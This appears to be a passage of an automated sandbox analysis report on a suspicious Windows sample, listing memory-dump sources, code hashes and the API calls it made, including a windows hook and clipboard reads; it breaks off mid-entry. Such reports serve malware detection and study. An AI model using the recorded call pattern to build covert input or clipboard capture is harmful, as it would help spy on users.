                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13ad000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                    • Instruction ID: ed3fe2821c1cd680b9eca2696de70b3d07328f03ebf3060054126011920dc4a7
                                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                    • Instruction Fuzzy Hash: 5F112676404280CFCB06CF44D5C4B16BF72FB88314F24C6A9D9490BA57C336D45ACBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100476831.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13bd000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction ID: b380206c3aa5a195c9d4c856dab1d3e1207a768cb0facec045db8e8927798b7b
                                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction Fuzzy Hash: C411BB75508280CFDB02CF54D5C4B15BFA1FB84218F28C6A9D94D4BA53C33AD40ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100882634.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1610000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cd1281c9e73aab765791a6f111d5367dac35947e5b874da441a4df85347052c9
                                                                    • Instruction ID: 61309ba3f647e6aea797780f06c46afb8d67818930e80ce8f560b6ece33ad0d1
                                                                    • Opcode Fuzzy Hash: cd1281c9e73aab765791a6f111d5367dac35947e5b874da441a4df85347052c9
                                                                    • Instruction Fuzzy Hash: 13D1E935C1075A8ACB11EF64D994A9DB771FFE5300F509B9AE00A7B210EB706EC9CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2104730144.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: true
                                                                    • Associated: 00000000.00000002.2104574579.0000000006530000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6530000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 91b9145814fa857218212ecc58d857041beb986bfe8aae16d8509df584f58278
                                                                    • Instruction ID: 27c5c6445b2a87fc111351f9edeae5495f7056d02f73807a30b7c9bcbdd019c0
                                                                    • Opcode Fuzzy Hash: 91b9145814fa857218212ecc58d857041beb986bfe8aae16d8509df584f58278
                                                                    • Instruction Fuzzy Hash: A701A9B1E056188BEB5CCF6B8C006DFFAF7AFC9300F08D0798408A6264EB7405458F55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:11.1%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:148
                                                                    Total number of Limit Nodes:18
execution_graph (node and edge dump of the rendered graph omitted; API calls that appear as graph nodes: CallWindowProcW, OleGetClipboard, CreateWindowExW, OleInitialize, GlobalMemoryStatusEx, KiUserCallbackDispatcher, DuplicateHandle, GetModuleHandleW, SetWindowsHookExA)
Strings
Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID: $]q$$]q$$]q$$]q$$]q$$]q
• API String ID: 0-3723351465
• Opcode ID: daf602048adf0bf6c23a19be27a297ff0264e38f8d860169ab089d6c9d74317d
• Instruction ID: 21da940a1bb0cfc29cc068137863d79a9ae039f5c73a7401c8c2b2078cd2d23d
• Opcode Fuzzy Hash: daf602048adf0bf6c23a19be27a297ff0264e38f8d860169ab089d6c9d74317d
• Instruction Fuzzy Hash: 00D24934A00209CFDB64DF68C584A9DB7F6FF89304F54C5AAD409AB265EB34EE85CB50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph for the function starting at 6ce7d60 (basic-block and edge dump of the rendered graph omitted; the executed/not-executed colouring is not recoverable from text)
Strings
Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID: $]q$$]q
• API String ID: 0-127220927
• Opcode ID: 8379933e516665e53d12242ecfac676df7704ac4e88f3b7c609db613e281badd
• Instruction ID: 8e7b292ea1b92e9996043386a2ee88c3bcd707efd141f0b6df7e5551e3a6260f
• Opcode Fuzzy Hash: 8379933e516665e53d12242ecfac676df7704ac4e88f3b7c609db613e281badd
• Instruction Fuzzy Hash: B2029D30B012168FDB58DBA8D894AAEB7F2FF84304F148529D405EB395DB35ED82CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a29b03c7a755be6723763b6a5e8ef4a6022a96790bf3550cc5dc35136699c5c9
• Instruction ID: 48af9d1bd3c0485ab43d4fe89d61c22f78603ecf440e3b70d2a1ae0c091604dd
• Opcode Fuzzy Hash: a29b03c7a755be6723763b6a5e8ef4a6022a96790bf3550cc5dc35136699c5c9
• Instruction Fuzzy Hash: 0D62CC34B202058FDB54DBA9D584BADBBF6EF88314F148469E406DB390DB35ED46CB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3af6a4c761350203b7a8beaac8c03a5eb338d498366f01d231d2ccdc29cc8216
• Instruction ID: b1020a9f87e425161ed14c6b833713b11e2e882e6132284a1782eb4387aa95d0
• Opcode Fuzzy Hash: 3af6a4c761350203b7a8beaac8c03a5eb338d498366f01d231d2ccdc29cc8216
• Instruction Fuzzy Hash: 5632AF34B002098FDF54DBA8E894BADBBB6FB88310F108529D415EB395DB35ED46CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 197890b5993fe2b9a221fe49342ead13b4a4ffd6eefa215cd46b76029cda693a
• Instruction ID: 620b8f62ee256c1ff9cdd278ce6b012f4981248f10969ff910e3ea827ae81507
• Opcode Fuzzy Hash: 197890b5993fe2b9a221fe49342ead13b4a4ffd6eefa215cd46b76029cda693a
• Instruction Fuzzy Hash: C3225F30F1020A8FDF65CB68D6947BDBBB6EB85310F24882AD449DB391DA34DD85CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8815e582e81f4911b25de4305bc916bf2512d1b96a9ae035a627ea807a770c07
• Instruction ID: 78d4d22fac18178267d93792429ae543470a9aeaaafa672f8f2b175f0b6cb023
• Opcode Fuzzy Hash: 8815e582e81f4911b25de4305bc916bf2512d1b96a9ae035a627ea807a770c07
• Instruction Fuzzy Hash: B612F435F102159FDB64DBA4D89076EB7B6FB84318F64882AD406DB381CB35ED42CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph for the function starting at 6ce9130 (basic-block and edge dump of the rendered graph omitted; the executed/not-executed colouring is not recoverable from text)
Strings
Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID: $]q$$]q$$]q$$]q
• API String ID: 0-858218434
• Opcode ID: b649f76cc94e85efcd095cb9f7668f713c869f09795a3ffc501f0db5843f5098
• Instruction ID: 29b93eb4bfdbaaf12cd8391182d8e1afe2ea4f5efd7cd38fa4713e384999eaa8
• Opcode Fuzzy Hash: b649f76cc94e85efcd095cb9f7668f713c869f09795a3ffc501f0db5843f5098
• Instruction Fuzzy Hash: D5914230B0021A9FDB54DF69D8547AEB7F6FF84204F108469C80DEB345EA74ED468B92
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph for the function starting at 6cecf30 (basic-block and edge dump of the rendered graph omitted; the executed/not-executed colouring is not recoverable from text)
Strings
Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID: $]q$$]q$$]q
• API String ID: 0-182748909
• Opcode ID: e29b4e1e3e2c9b2bf5c7195ce4cd8473770ba6a7ba40c60f63cc53e294f07e45
• Instruction ID: c0e417d3a01109263b085ba6130c871a65b3abc347087b18aca1b2a1187dd384
• Opcode Fuzzy Hash: e29b4e1e3e2c9b2bf5c7195ce4cd8473770ba6a7ba40c60f63cc53e294f07e45
• Instruction Fuzzy Hash: 5562503070020A8FCB55DF68E594A5DBBF6FF84344B108969D00A9F36ADB75ED86CB81
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID: fbq$XPbq$\Obq
• API String ID: 0-4057264190
• Opcode ID: e06876ac8f444a5506e858aa38fe4d2c43731c4650d308208b055f8a3881c6c0
• Instruction ID: fa595b13517c4116b3af9f616d4b14e26a212a66dff9dc577e43c29d2ad3212d
• Opcode Fuzzy Hash: e06876ac8f444a5506e858aa38fe4d2c43731c4650d308208b055f8a3881c6c0
• Instruction Fuzzy Hash: AE617F30F0021A9FEB549FA9C8547AEBAF6FF88700F208529D106EB395DE759D418B91
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.4525926697.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3040000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID: _
• API String ID: 0-701932520
• Opcode ID: 6c53238ffe393cca3375fa7c5e81beb3f71d64475e45c51940bd393ba02a700d
• Instruction ID: b09384d9e680e745290708ea3f3733b1d24f5228b74dac2d40cdde48c057e348
• Opcode Fuzzy Hash: 6c53238ffe393cca3375fa7c5e81beb3f71d64475e45c51940bd393ba02a700d
• Instruction Fuzzy Hash: 174111B2D043898FC704CFB9D8042AEBFF6BF89210F18856AD404A7391DB789985CBD0
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID: 0o@p$Dq@p
• API String ID: 0-1537369123
• Opcode ID: f4dcedbaa3cad30df6060e79300318393e5a9a68ed7a498aa48e1f4f77a0f642
• Instruction ID: 22f126b85817ebd8fa0d066890b23d7ec26074e6b500e639de282fdd0e72cfd5
• Opcode Fuzzy Hash: f4dcedbaa3cad30df6060e79300318393e5a9a68ed7a498aa48e1f4f77a0f642
• Instruction Fuzzy Hash: 2AE1A030B002058FCB55DB79E494AADBBF2EF88314F108569D41ADB362DB35ED86CB91
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID: $]q$$]q
• API String ID: 0-127220927
• Opcode ID: 6a558d4885fb2b2fe861bef36a6c646edea38e7fee7140e1b2acf0edc8af181e
• Instruction ID: 740fa4bbc597c7ff9a17290cc372bdbcc16788c9be0c1f19c61b8fade9b8b570
• Opcode Fuzzy Hash: 6a558d4885fb2b2fe861bef36a6c646edea38e7fee7140e1b2acf0edc8af181e
• Instruction Fuzzy Hash: A4518331B002169FDB54DB78D864BAEB7F6FF84204F108469C909DB394EE34ED468B92
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
Similarity
• API ID:
• String ID: fbq$XPbq
• API String ID: 0-2292610095
• Opcode ID: 13b46bac4db263febf9cafebd9f533c55b9ccc0d8e6cbf87925d287ad8c6106c
• Instruction ID: 9f0d946ca6357d58a67f35d39dfa8a6032f8e7e484ada4b72755553dcc26f3ed
• Opcode Fuzzy Hash: 13b46bac4db263febf9cafebd9f533c55b9ccc0d8e6cbf87925d287ad8c6106c
• Instruction Fuzzy Hash: 3F517D30F002099FDB559FE9C854BAEBAF6FF88700F208529D106AB395DA759D01CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CD26AA
Memory Dump Source
• Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 0e9fa0639509d0cafdccc7b90b6e1f11e3dbea0663961bea15ec058f18e53877
• Instruction ID: 4bd63a51884fec5d13ee44b56cf897956f6a20b587a3d941a4793e4ee75184c6
• Opcode Fuzzy Hash: 0e9fa0639509d0cafdccc7b90b6e1f11e3dbea0663961bea15ec058f18e53877
• Instruction Fuzzy Hash: A841B0B1D003099FDB14CF9AC984ADEFBB5FF48310F24812AE919AB250D775A945CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CD26AA
Memory Dump Source
• Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 49c2055c32bda56a27a6eba9dec889393dc04b39b0e241ae11be21fbf856ceed
• Instruction ID: aaa31ea53b1b9cbf8e11b91cab41740cdf44f19cb8839cfb20c9e57607c2c01f
• Opcode Fuzzy Hash: 49c2055c32bda56a27a6eba9dec889393dc04b39b0e241ae11be21fbf856ceed
• Instruction Fuzzy Hash: 4741BEB1D003099FDB14CF9AC984ADEFBB5FF48310F24812AE919AB250D775A985CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 06CD7249
Memory Dump Source
• Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 59242cfd289cd8265267876242e8ea4cf5467babc6de833d03123c0df78d8507
• Instruction ID: f3d3b0baf99ef90827850cc7f1d8283ad69f8324bcbe2f62980f9264a046b1bb
• Opcode Fuzzy Hash: 59242cfd289cd8265267876242e8ea4cf5467babc6de833d03123c0df78d8507
• Instruction Fuzzy Hash: CF4119B5900345DFDB54DF99C888AAAFBF5FF88318F248459E519A7321D334A941CFA0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
Similarity
• API ID: Clipboard
• String ID:
• API String ID: 220874293-0
• Opcode ID: ac9f1946219a06c87cbfdff311589d3f16a812ad85522d2f06cb35b70de17163
• Instruction ID: 8cc7685426dd17b89d83ffec7a7ccadb2ba3473844d6ff51e7fc1adb5aedfed0
• Opcode Fuzzy Hash: ac9f1946219a06c87cbfdff311589d3f16a812ad85522d2f06cb35b70de17163
• Instruction Fuzzy Hash: 6F3112B1D012089FDB50DF99D984BDEFBF5EB48310F20802AE508AB290CB756945CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
Similarity
• API ID: Clipboard
• String ID:
• API String ID: 220874293-0
• Opcode ID: ac49913b21c0ee52c65e46429f2f6f6c6aecbbefe680042f49c6d15ad77dbbe7
• Instruction ID: 5aa5b2893753fc45e215fab998f7eea79a9228ddda036572b5f5d3b07b649692
• Opcode Fuzzy Hash: ac49913b21c0ee52c65e46429f2f6f6c6aecbbefe680042f49c6d15ad77dbbe7
• Instruction Fuzzy Hash: 4F3100B0D01209DFDB60DF99C984BDEBBF5AF48304F248029E508BB390D775A944CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06CD6377
Memory Dump Source
• Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 6b2b318c72d59f6bdd0325358fcbf0a4a870941f5b63684422ac68f915560379
• Instruction ID: 8ae082388f250ad39eec8e3343bae8af7a8bef0b754c339188d7ea5ce26738c6
• Opcode Fuzzy Hash: 6b2b318c72d59f6bdd0325358fcbf0a4a870941f5b63684422ac68f915560379
• Instruction Fuzzy Hash: AE21C3B59002489FDB10DF9AD584AEEFBF9EB49320F14841AE958A3350C378A944CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06CD6377
Memory Dump Source
• Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 5122ac41689c3e5266f834958108dcc9ce9e3f234a414294994f3998359c44f7
• Instruction ID: cfaa0cd571dea4057e92abd42d96d9234c617792c86a7095f64e4f2d4042e13b
• Opcode Fuzzy Hash: 5122ac41689c3e5266f834958108dcc9ce9e3f234a414294994f3998359c44f7
• Instruction Fuzzy Hash: B621C4B5D002499FDB10DF9AD984AEEFBF9FB48310F14841AE918A3350D378A954CFA5
Uniqueness
Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CD9A8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 7607df27cea424d460ba34e313f4671946596216b2d029882ebe3d3b219578f6
                                                                    • Instruction ID: 491cc4b3b1b874bd8259db81dce0220c16604dd735f8f83dff1e00579ac02ae5
                                                                    • Opcode Fuzzy Hash: 7607df27cea424d460ba34e313f4671946596216b2d029882ebe3d3b219578f6
                                                                    • Instruction Fuzzy Hash: F721E2B5D002099FCB54DF9AD844BEEFBF9FB88310F10842AE519A7250C775AA45CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CD9A8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 61dbd580d9ecd3786ca46930c7f163833e54b8272115756e9b4a4d569a0769fe
                                                                    • Instruction ID: 60429f459d1bc691fcaab79fb9230f2e2fce3512074b5c023079240bc85f44a1
                                                                    • Opcode Fuzzy Hash: 61dbd580d9ecd3786ca46930c7f163833e54b8272115756e9b4a4d569a0769fe
                                                                    • Instruction Fuzzy Hash: 1121E2B5D002099FCB54DF9AC844BEEFBF5FB88310F10842AE519A7250C775AA45CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 0304EAC7
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4525926697.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_3040000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: 317a0dca76bd3e9d7afa39a025b65c9e14cb6b92bc25b0a38e647462e7d0719c
                                                                    • Instruction ID: 75638c57ee347bafa3f77dd2267c635a04468b96bf1ad74e543a58ceee32b83f
                                                                    • Opcode Fuzzy Hash: 317a0dca76bd3e9d7afa39a025b65c9e14cb6b92bc25b0a38e647462e7d0719c
                                                                    • Instruction Fuzzy Hash: B511E2B1C006599BCB10DF9AC544AAEFBF5FF48320F14816AD818A7240D778A954CFE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06CD1556
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 13b6087fa5097c889617942b5c52e615bd2ac0ee1f770a21ca6fb2f6bcb47660
                                                                    • Instruction ID: d6635ebfbf01c02a416084561dbf04a72bb4fafe76ad77a42370bcc78dcd060f
                                                                    • Opcode Fuzzy Hash: 13b6087fa5097c889617942b5c52e615bd2ac0ee1f770a21ca6fb2f6bcb47660
                                                                    • Instruction Fuzzy Hash: 5B110FB6D002498FDB10DF9AD944BEEFBF4AF48220F14845AD529B7610D378A645CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06CD1556
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: e6f735535c953f678eea8d2ca8c3ff55a303262c0e23b974bc24f3ddb18a470e
                                                                    • Instruction ID: d1958c1886df93b2e3ba9a2f404f22634dc8dc2490c2a3ff53d4827cf810efa7
                                                                    • Opcode Fuzzy Hash: e6f735535c953f678eea8d2ca8c3ff55a303262c0e23b974bc24f3ddb18a470e
                                                                    • Instruction Fuzzy Hash: 241110B6D002498FDB10DF9AD444ADEFBF8EF88320F14845AD529B7600D379A645CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 06CD7DDD
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: de40ed4143cff9027dd9e82caca1d55fc69c01a083322c727c9877e8a3ffe6c7
                                                                    • Instruction ID: 50659ba110a555b09325405e3764df1c59a1459abdd37662021986cbaf1cc124
                                                                    • Opcode Fuzzy Hash: de40ed4143cff9027dd9e82caca1d55fc69c01a083322c727c9877e8a3ffe6c7
                                                                    • Instruction Fuzzy Hash: C71115B19003498FDB20DF9AD544BEEFBF8EB48320F208459D518A7300D378A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06CD7495), ref: 06CD751F
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 87840b33030d910d748e7048044f9f78f5236cd0f752f65591ed8f143ebeb83d
                                                                    • Instruction ID: aa0df1033b4c9c14661f4184a27e3378a384f5ba3ba732b12acb19349cc63356
                                                                    • Opcode Fuzzy Hash: 87840b33030d910d748e7048044f9f78f5236cd0f752f65591ed8f143ebeb83d
                                                                    • Instruction Fuzzy Hash: 041103B18002498FCB10DF9AD444BAEFBF8EB48324F20845AD519A7350D378A944CFE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06CD7495), ref: 06CD751F
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 1bd4d5ed544387a946806eb6be6ab76fcc70f039d3aa8a662fdee949b65c1cef
                                                                    • Instruction ID: 63ff97bda2f1820e86eadc38fa391d998bb16734d1c515e0b8c82ea9c57df410
